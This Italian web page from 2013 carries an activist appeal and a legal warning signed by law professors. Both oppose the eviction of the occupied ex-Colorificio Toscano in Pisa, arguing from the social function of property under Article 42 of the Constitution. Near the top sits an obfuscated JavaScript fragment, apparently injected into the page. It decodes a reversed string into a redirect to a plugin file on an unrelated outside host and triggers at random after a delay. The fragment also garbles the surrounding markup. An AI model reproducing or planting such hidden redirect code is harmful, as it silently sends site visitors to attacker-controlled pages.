Pisa rinnega il grigiore, ma l'ex-Colorificio è a rischio sgombero. Il testo dell'appello

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2013/02/aureliapainting.gif”>La J-Colors, l’impresa multinazionale che ha acquistato alla fine degli anni Novanta l’ex Colorificio Toscano chiudendone in pochi anni la produzione e licenziando i lavoratori, lasciando in uno stato di gravissimo abbandono l’intera di area di circa 14.000 mila metri quadri, ha richiesto negli scorsi giorni lo sgombero del Municipio dei Beni Comuni di Pisa che dal 20 ottobre ha restituito alla città questa ex fabbrica.

Un atto che arriva a pochi giorni dallo svolgimento di United Colors of Commons, una tre giorni che sia a livello locale che nazionale ha posto il Municipio e l’ex-Colorificio, con tutte le sue progettualità e proposte concrete di riqualificazione dell’area e di costruzione di un’altra società, come un bene comune per tutti. “United Colors of Commons” ha, infatti, dato l’occasione di partecipare principalmente all’idea che i territori e le sue dinamiche possano essere ridisegnati, a partire dalla messa a valore delle esperienze di altri contesti urbani italiani e europei che intrecciano le questioni locali, nell’idea di una nuova periferia che si fa centro d’ideazione.

In questi tre mesi il Municipio ha aperto uno spazio ai cittadini e alle cittadine ma anche un luogo di confronto e di liberazione all’interno di una delle tante, troppe, aree private dismesse su cui le aziende provano a condurre operazioni speculative. La J Colors ha colpevolmente lasciato in abbandono un luogo dove per quasi un secolo centinaia di lavoratori hanno vissuto, e ad oggi non ha alcun progetto su quell’area: la sua sola speranza è quello di venderla, magari avendo in mano una variante urbanistica. Ma in quasi quindici anni non ci è mai riuscita e vista la crisi del mercato immobiliare la sola cosa che accadrà se si sgombererà il Municipio dei Beni Comuni è che questa rovina industriale rimarrà così per anni.

Noi a tutto ciò non ci rassegniamo. Lanciamo da oggi una campagna per difendere il Municipio dei Beni Comuni e soprattutto le relazioni sociali che sta costruendo. La liberazione dell’ex-Colorificio Toscano pone oggi una questione sul piano nazionale: il recupero delle grandi aree dismesse e la funzione sociale della proprietà privata, tanto più in una fase di crisi economica come è quella che stiamo attraversando.

A chi sta provando a trasformarci in un problema di ordine pubblico, sperando forse in una nostra chiusura, rispondiamo con il solo modo che conosciamo: moltiplicando le attività e le iniziative all’interno del Colorificio, continuando i lavori di recupero all’interno della struttura, per offrire nuove possibilità di incontro e crescita collettiva.
Colpisce ancora una volta l’assordante silenzio dell’amministrazione comunale di Pisa in tutti questi mesi e tanto più alla luce di questi avvenimenti: un silenzio che ad oggi rischia di apparire una complicità a fronte del pericolo di sgombero e delle responsabilità evidenti della proprietà sullo stato di abbandono dell’ex-fabbrica.

Difendere il Municipio dei Beni Comuni e l’ex-Colorificio Liberato è oggi una battaglia per la democrazia a Pisa e non solo. Vogliamo dare da questo luogo un messaggio di speranza e di possibilità a tutte quelle esperienze sociali che in giro per il mondo e in Italia costruiscono nuove forme di democrazia dal basso. Noi ci vogliamo credere: è possibile evitare lo sgombero e fermare l’arroganza di una multinazionale e le politiche speculative che stanno mangiando le nostre città.

Per questo il Municipio convoca per martedì 5 febbraio alle 21 un’assemblea pubblica in vista di una grande manifestazione a difesa del Colorificio che si svolgerà il 16 febbraio.

OGGI VENERDI’ 1 FEBBRAIO ORE 15 SPECIALE IN DIRETTA SU WWW.RADIOROARR.ORG
Difendi l’ex Colorificio Liberato – Aggiornamenti da un bene comune in pericolo

MARTEDI’ 5 FEBBRAIO ORE 21 ASSEMBLEA PUBBLICA

SABATO 9 E DOMENICA 10 FEBBRAIO COLORIFICIO IN FESTA

SABATO 16 FEBBRAIO MANIFESTAZIONE PER LE  STRADE DI PISA

Difendi l’ex colorificio! Vieni a studiare con noi!
APRE L’AULA STUDIO
http://www.inventati.org/rebeldia/saperi/difendi-lex-colorificio-vieni-a-studiare-con-noi.html

Comunicato Laboratorio Urbano RESET
http://www.inventati.org/rebeldia/spazi-sociali/minaccia-di-sgombero-anche-al-municipio-del-bene-comune-di-pisa.html

Mario Pezzella
http://www.inventati.org/rebeldia/spazi-sociali/comunicato-di-solidarieta.html

SEGUI TUTTI GLI AGGIORNAMENTI SU WWW.REBELDIA.NET E ASCOLTACI IN STREAMING SU WWW.RADIOROARR.ORG

Diffida

Pisa, 1 Febbraio 2013

Al Sindaco di Pisa
Al Prefetto di Pisa
Al Questore

Da oltre cinque anni un’area di 14.000 mq dove per quasi un secolo centinaia di lavoratori hanno prestato la loro manodopera è stata lasciata in stato di abbandono e degrado a poca distanza dalla Piazza dei Miracoli di Pisa.

La multinazionale J Colors non ha più alcun interesse in termini produttivi, come dimostra il fatto che dal 2010 questo immobile non è più a bilancio e dall’Aprile 2012 l’azienda ha comunicato ufficialmente la cessazione dell’unità operativa, sospesa già negli anni passati con il licenziamento degli ultimi operai da Gennaio 2009. La JColors all’oggi non solo non ha nessun interesse nella ripresa dell’attività produttiva dello stabile, ma già dal 1998 ha cercato più volte di vendere l’area senza riuscirvi. A dimostrazione ulteriore di questo obiettivo risultano le numerose richieste al Comune di Pisa da parte della multinazionale JColors per ottenere una variante urbanistica che mutasse la destinazione d’uso dell’area da produzione di beni e servizi a residenziale.

L’interesse meramente speculativo è confermato inoltre dal breve tempo intercorso tra l’acquisizione dell’area e del marchio da un secolo pisano del “Colorificio Toscano”, e la prima richiesta di variazione d’uso e collaterali trattative di vendita che è stato di soli venti giorni.

La storia dell’area degli ultimi 15 anni e la più recente cessazione dell’attività produttiva indicano senza ombra di dubbio come la proprietà non abbia alcuna progettualità o urgente necessità di utilizzo dell’area. Le uniche operazioni che la J Colors ha effettuato sono state alcuni trasferimenti di macchinari dalla sede pisana a quella di Verbania, operazioni che il Municipio dei Beni Comuni che dal 20 Ottobre svolge le proprie attività all’interno dell’ex-colorificio, ha sempre permesso in clima di totale collaborazione, assistendo con i propri occhi all’ulteriore abbandono da parte della proprietà dello stabile pisano.

Alla luce del colpevole abbandono, una vera derelictio delle utilità produttive tipiche della stessa, al Municipio dei Beni Comuni è apparso legittimo e sostenuto da più di un titolo costituzionale, sia di quelli sottocitati ma anche Art.1, Art. 2, Art. 3, Art. 4, Art. 9, Art. 11, Art. 18, Art.21, riaprire l’area della fabbrica e renderla accessibile alla città iniziando al suo interno numerose attività rispondenti a necessità e bisogni più volte emersi dal territorio e dalla popolazione presente, sia residente che studentesca, come la Ciclofficina, la palestra popolare e la parete d’arrampicata, attività sociali e culturali sia di tipo musicale, come i vari festival hip hop, hardcore o reggae, che hanno dato risalto alla scena musicale pisana indipendente, o teatrale, come anche iniziative di approfondimento e discussione. L’ex-colorificio inoltre è stato protagonista di importanti giornate dedicate all’arte, in cui le mura lasciate al degrado e all’usura del tempo hanno ripreso vita attraverso importanti murales di giovani artisti locali, ma anche attraverso l’arte principiante di giovani artisti di quartieri pisani disagiati, fino a fare diventare l’ex-colorificio una vera e propria “opera d’arte”.

Ma la Progettualità che al suo interno si è delineata negli ultimi tre mesi è molto più varia, infatti è riuscita a dare risposte in termini di spazio a molte altre associazioni e a progetti di singoli cittadini e cittadine che fino ad oggi venivano ignorati. Attualmente la progettualità è ancora un work in progress che continuamente cresce e si arricchisce e che alleghiamo alla presente, a dimostrazione della necessità reale e urgente d’uso di questi locali da parte delle associazioni e dei collettivi.

La progettualità elaborata tiene conto di criteri fondamentali per lo sviluppo urbano e paesaggistico dell’area di viale delle Cascine, che infatti si inserisce nella attuale destinazione d’uso produttivo dell’area (corsi di formazione artigianale per giovani e messa in circolazione di saperi relativi ai vecchi mestieri), tutelando l’impiego dei lavoratori che operano nelle industrie presenti, ma anche rispetto alla sua vicinanza all’obiettivo turistico di Piazza dei Miracoli e l’area del Parco di San Rossore, cerca di inserire iniziative di intrattenimento e di accoglienza.

In ultimo ricordiamo l’importante avvenimento socio-culturale e politico di rilievo locale e nazionale che l’ex-colorificio ha ospitato nelle giornate del 25-26-27 Gennaio “United Colors of Commons”, iniziativa che ha visto la partecipazione di centinaia di persone non solo pisane ma da tutta Italia, e che ha visto nella giornata di sabato la ripresa dell’ importante dibattito giuridico sulla funzione sociale della proprietà privata di cui all’ Art. 42 Costituzione, sviluppatosi in precedenza in sede di redazione del Codice Civile e di Assemblea Costituente del ’48, e poi spentosi dalla fine degli anni settanta. Un dibattito riapertosi al Colorificio, con la partecipazione di cattedratici di varie università (Palermo, Torino, Perugia) e che verrà ampliato e ospitato, con la partecipazione attiva di Stefano Rodotà, su un prossimo numero della Rivista Critica di Diritto Privato da lui diretta.

La liberazione dell’ex-colorificio rappresenta senz’ altro un’azione di natura politica, non finalizzata al conseguimento di un profitto personale o di un interesse di natura patrimoniale (cfr. Trib. Roma, VII sez., 8 febbraio 2012);l’ex area industriale risulta da molti anni inutilizzata, con la conseguenza che ampi spazi di suolo destinabili alla collettività per scopi diversi risultano completamente abbandonati e degradati a causa del comportamento assenteista della proprietà.

I dimostranti hanno così recuperato l’immobile vacante attraverso pratiche di occupazione e di restituzione all’accessibilità pubblica e non certo di spoglio (inteso come privazione violenta o clandestina dell’altrui materiale possesso contrastabile ex 1168 Cod. Civ.), collocando consapevolmente la propria azione nel solco costituzionale dell’articolo 42 Cost. Questa norma, insieme a disposizioni come gli Art. 2, 3, 9 e 43 Carta fondamentale, tutela la personalità umana ed il suo svolgimento nell’ambito concreto delle pratiche politiche collettive qui poste in essere per il soddisfacimento di bisogni costituzionalmente garantiti. Il raggiungimento di questo scopo sociale passa attraverso la fruizione diretta di beni e servizi che sono appunto funzionali a perseguire e soddisfare interesse collettivi costituzionalmente rilevanti inclusi il lavoro (Art. 35), l’arte e la scienza (Art.33), e anche la salute (Art. 32).

La derelizione di utilità funzionalmente sociali qualifica la situazione attuale dell’ex-colorificio. Questo immobile invece di essere ufficialmente espropriato o confiscato per valorizzarlo, adempiendo un obbligo costituzionale della “Repubblica” in tutte le sue articolazioni istituzionali di “rimuovere gli ostacoli di ordine economico e sociale che limitando di fatto la libertà e l’ uguaglianza dei cittadini impediscono il pieno sviluppo della persona umana” (Art. 3 Cost.) in un periodo in cui il bisogno di spazi pubblici è sempre più forte, è di fatto lasciato al progressivo degrado, in un quadro di sostanziale connivenza pubblica con il potere privato. L’abbandono dell’immobile e la sua sottrazione alla cittadinanza realizza una logica abusiva di esclusione, che contrasta altresì con le istanze di solidarietà sociale e del diritto all’ accesso alla proprietà di cui allo stesso Art. 42.

In questo contesto, se ciò che più conta è la funzione che tale bene può rivestire e gli interessi con cui esso è collegato, indipendentemente dalla titolarità pubblica o privata dello stesso, l’ex-colorificio rappresenta un bene comune, che la collettività può anzi deve valorizzare nell’ esercizio della cittadinanza attiva. Tale categoria giuridica trova un riconoscimento anche in giurisprudenza (cfr. SS.UU. sent. n. 3665/2011), dopo essere stata descritta in dottrina e aver trovato un pratico riscontro nella campagna referendaria “acqua bene comune” e nelle esperienze di occupazione del Cinema Palazzo e del Teatro Valle di Roma, del Teatro Marinoni di Venezia, Del Teatro Coppola di Catania, del Teatro Garibaldi di Palermo, al Pinelli di Messina al Teatro Rossi nella stessa Pisa, tutti luoghi riconosciuti come essenziali beni comuni, e recuperati per motivi morali e sociali alla fruizione collettiva. Si noti che tutte le suddette dimostrazioni di cittadinanza attiva sono state accettate da istituzioni del più diverso colore politico. Poiché la natura pubblica o privata del titolo formale ai beni comuni è da considerarsi teoreticamente irrilevante rispetto alla loro funzione costituzionalmente garantita (Vedi anche Commissione Ministero Giustizia Principi e Criteri Direttivi per la novellazione del Codice Civile, 14 giugno 2007) di fruizione collettiva e sociale (42 Cost.), l’ esercizio civilistico dello ius excludendi sull’ex-colorificio, a fronte di lunghi anni di abbandono, è da considerarsi emulativo ex art. 833 Codice Civile e dunque abusivo. Esso può essere in ogni caso unicamente esercitato nei limiti e nelle forme della tutela petitoria (Art. 948) in quanto sola procedura idonea a un approfondimento giurisdizionale delle questioni, anche costituzionali, inerenti il titolo. È evidente che il Municipio dei Beni Comuni è nato al fine di salvaguardare un bene altrimenti abbandonato, con lo scopo di conservarlo e, soprattutto, di valorizzarlo nell’ interesse di tutta la cittadinanza e che un interesse privato gravemente sospetto di essere abusivo emulativo e contrario a diritti fondamentali della persona non può certo servirsi delle forza pubblica per rientrare in un possesso inesistente in quanto non esercitato.

Per questo noi giuristi e docenti universitari esperti in materia proprietaria e costituzionale riteniamo del tutto inammissibile e potenzialmente produttivo di conseguenze politiche e giuridiche, che il Comune di Pisa invece di valorizzare e incoraggiare questa importante esperienza di uso generativo della proprietà privata, consenta lo sgombero del Municipio dei Beni Comuni dal Colorificio Liberato. Non ci par dubbio che debba ritenersi costituzionalmente prevalente l’azione di valorizzazione dell’immobile rispetto allo stato di abbandono e di degrado cui esso stesso è sottoposto, di per sé idoneo a configurare un’ipotesi di abuso del diritto di proprietà.

Nel ricordare al Prefetto e al Questore che solamente in modo gravemente lesivo delle proprie prerogative legali e costituzionali potrebbero procedere al di fuori dei limiti di legge e del controllo preventivo giurisdizionale ordinario, ci dichiariamo disponibili a collaborare nella ricerca di una soluzione giuridica che consenta la piena valorizzazione sociale e l’ accesso al bene comune contemperando le ragioni della produzione e generazione di beni comuni con quelle della proprietà.

Primi firmatari:

Prof. Avv. Ugo Mattei, Ordinario di Diritto Civile Università di Torino
Prof. Avv. Luca Nivarra, Ordinario di Diritto Civile Università di Palermo
Prof. Avv. Maria Rosaria Marella, Ordinario di Diritto Privato Università di Perugia
Prof. Stefano Rodotà, Professore Emerito Diritto Civile
Prof. Salvatore Settis, Accademico dei Lincei
Prof. Alberto Lucarelli, Ordinario di Istituzioni di Diritto Pubblico Università di Napoli Federico II
Prof. Umberto Breccia, Ordinario di Diritto Privato Università di Pisa
Prof. Elisabetta Grande, Ordinario di Diritto Comparato Università Piemonte Orientale
Prof. Giovanni Marini, Ordinario di Diritto Comparato Università di Perugia
Prof. Federica Giardini, ricercatrice Filosofia Politica Università Roma III

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *